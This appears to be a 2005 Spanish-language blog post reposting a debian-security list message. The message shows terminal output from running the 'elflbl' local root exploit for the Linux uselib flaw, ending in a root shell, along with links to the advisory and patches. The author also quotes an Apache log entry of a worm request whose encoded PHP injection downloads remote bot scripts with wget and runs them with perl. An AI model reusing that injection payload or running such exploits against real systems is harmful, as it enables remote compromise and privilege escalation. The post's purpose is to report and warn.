y comenzamos el a�o rooteable! :D

From: Carlos Tirado
Reply-To: Carlos Tirado
To: debian-security at lists.debian.org
Date: Mon, 10 Jan 2005 12:36:27 -0300
Subject: Re: local root exploit

carlos@tuxsystem:~/security$ ./elflbl -f
[+] SLAB cleanup
child 1 VMAs 65406
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd4000000 – 0xe7ff1000
Wait… -
[+] race won maps=51294
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd4915000

- Hide quoted text -
[+] gate modified ( 0xffec90f4 0x0804ec00 )
[+] exploited, uid=0

sh-2.05a# whoami
root

!!!!

more info http://isec.pl/vulnerabilities/isec-0021-uselib.txt

ya salio un patch
para 2.4.28: http://www.grsecurity.net/linux-2.4.28-secfix-200501071141.patch
y para 2.6.10: http://www.grsecurity.net/linux-2.6.10-secfix-200501071130.patch

mi sistema es:
Linux version 2.4.28 (root@tuxsystem) (gcc version 2.95.4 20011002 (Debian prerelease)) #2 Fri Nov 19 12:27:33 CLST 2004
en Debian Woody

q rico! root local :s y sin contar el millar de gusanos perl que intentan colarse al sistema dia a dia, solo basta con ver las estadisticas de mi weblog en http://carlos.distro.cl/blog/stats (las weas q usan user agent lwp**) son unos lindos gusanos que dejan request en mi apache de la siguiente forma :

205.209.134.190 – - [10/Jan/2005:12:43:54 -0300] “GET
/blog/index.php?cat=1&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20

http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.

htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%
54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527′; HTTP/1.1″ 200 158434

y asi un sinnumero de veces por dia! y todos provenientes de server vulnerables :s al parecer este a�o 2005 sera algo agitado :p

Compartelo!